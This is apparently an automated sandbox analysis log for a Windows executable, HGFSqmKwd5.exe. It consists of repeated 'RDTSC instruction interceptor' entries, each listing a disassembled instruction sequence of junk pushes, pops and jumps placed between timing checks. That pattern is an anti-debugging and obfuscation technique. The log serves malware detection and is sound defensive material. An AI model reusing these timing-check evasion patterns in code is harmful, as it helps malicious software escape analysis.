Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168F652 second address: 168F656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168F656 second address: 168F6CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4464DAB8D6h 0x00000010 nop 0x00000011 jmp 00007F4464DAB8CCh 0x00000016 lea eax, dword ptr [ebp+12B7015Dh] 0x0000001c mov dword ptr [ebp+129C3727h], esi 0x00000022 jmp 00007F4464DAB8D6h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b jmp 00007F4464DAB8D8h 0x00000030 pop edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168F6CF second address: 1674F2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d or eax, 0228FEE4h 0x00000013 jnc 00007F4464F4BF1Ch 0x00000019 popad 0x0000001a pushad 0x0000001b mov dh, CDh 0x0000001d or dword ptr [ebp+129C2723h], edi 0x00000023 popad 0x00000024 lea eax, dword ptr [ebp+12B70119h] 0x0000002a mov ecx, dword ptr [ebp+129C1BC5h] 0x00000030 push eax 0x00000031 jmp 00007F4464F4BF22h 0x00000036 mov dword ptr [esp], eax 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F4464F4BF18h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 mov dword ptr [ebp+129C1BC0h], ecx 0x00000059 call dword ptr [ebp+129C1DEDh] 0x0000005f push eax 0x00000060 pushad 0x00000061 push ebx 0x00000062 pop ebx 0x00000063 jnl 00007F4464F4BF16h 0x00000069 popad 0x0000006a je 00007F4464F4BF1Ch 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16CB317 second address: 16CB31D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16CB31D second address: 16CB329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16CB329 second address: 16CB32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16CB4BF second address: 16CB4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4464F4BF16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4464F4BF1Bh 0x00000012 jno 00007F4464F4BF16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0132 second address: 16D0136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0136 second address: 16D013C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D013C second address: 16D0152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F4464DAB8CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0152 second address: 16D0177 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4464F4BF16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4464F4BF23h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0177 second address: 16D017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D017B second address: 16D0187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0187 second address: 16D0191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4464DAB8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D02F8 second address: 16D02FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D04CB second address: 16D04F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F4464DAB8CBh 0x0000000c jmp 00007F4464DAB8D4h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D061B second address: 16D061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0BC9 second address: 16D0BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0BCF second address: 16D0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0BD5 second address: 16D0BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0D35 second address: 16D0D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4464F4BF1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0D4D second address: 16D0D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D0ECD second address: 16D0ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D1642 second address: 16D1666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4464DAB8CAh 0x0000000a js 00007F4464DAB8C6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F4464DAB8C6h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D76E3 second address: 16D76E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D76E7 second address: 16D771F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4464DAB8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F4464DAB8CFh 0x00000014 jmp 00007F4464DAB8D9h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D63A3 second address: 16D63AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D63AB second address: 16D63BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F4464DAB8CAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D63BC second address: 16D63CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4464F4BF1Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D63CE second address: 16D63DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4464DAB8D2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D63DB second address: 16D63E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D66CC second address: 16D66F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F4464DAB8C6h 0x0000000e jmp 00007F4464DAB8D7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D66F1 second address: 16D66FB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4464F4BF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D6B8E second address: 16D6B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D6B94 second address: 16D6BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4464F4BF1Dh 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D6BAE second address: 16D6BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D6BB2 second address: 16D6BBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16D6BBC second address: 16D6BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E12AD second address: 16E12C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4464F4BF27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E12C8 second address: 16E12CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E12CC second address: 16E12EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4464F4BF24h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E12EC second address: 16E12F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E15C8 second address: 16E15CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E3762 second address: 16E3771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E38EC second address: 16E38FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E38FA second address: 16E3905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16E7421 second address: 16E7436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EDB2F second address: 16EDB43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4464DAB8CDh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EDB43 second address: 16EDB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F4464F4BF16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EDB51 second address: 16EDB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EDB57 second address: 16EDB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4464F4BF28h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EC376 second address: 16EC37A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EC37A second address: 16EC387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EC502 second address: 16EC506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EC506 second address: 16EC50C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EC50C second address: 16EC512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16EC679 second address: 16EC67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16ECC57 second address: 16ECC5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16ECC5B second address: 16ECC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16ECC66 second address: 16ECC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jl 00007F4464DAB8E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F4464DAB8C6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16ECDC6 second address: 16ECDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16ECDCA second address: 16ECE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4464DAB8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F4464DAB8CCh 0x00000012 jmp 00007F4464DAB8D1h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4464DAB8CCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16ECE03 second address: 16ECE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F27AA second address: 16F27AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F27AE second address: 16F27D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4464F4BF1Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F1BAD second address: 16F1BBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F1BBD second address: 16F1BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F1BC3 second address: 16F1BCF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F1BCF second address: 16F1BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F1D2E second address: 16F1D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F1D34 second address: 16F1D40 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4464F4BF16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F1ED4 second address: 16F1EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F2385 second address: 16F2391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4464F4BF16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F2391 second address: 16F2399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F2399 second address: 16F239E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F8A8F second address: 16F8ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4464DAB8D5h 0x0000000e jg 00007F4464DAB8C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F8DB9 second address: 16F8DBE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F8DBE second address: 16F8DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F90D7 second address: 16F90FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Ch 0x00000007 jmp 00007F4464F4BF21h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F93D1 second address: 16F93DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4464DAB8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F9CC1 second address: 16F9CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F9CC5 second address: 16F9CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F9CC9 second address: 16F9CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F9CCF second address: 16F9CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F9CD7 second address: 16F9D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F4464F4BF16h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jl 00007F4464F4BF22h 0x0000001e jnp 00007F4464F4BF16h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F9D06 second address: 16F9D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F4464DAB8CBh 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16F9D1D second address: 16F9D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16FFB71 second address: 16FFB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16FFB79 second address: 16FFB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1702EBC second address: 1702EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1703052 second address: 1703058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1703058 second address: 170305E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170305E second address: 1703062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
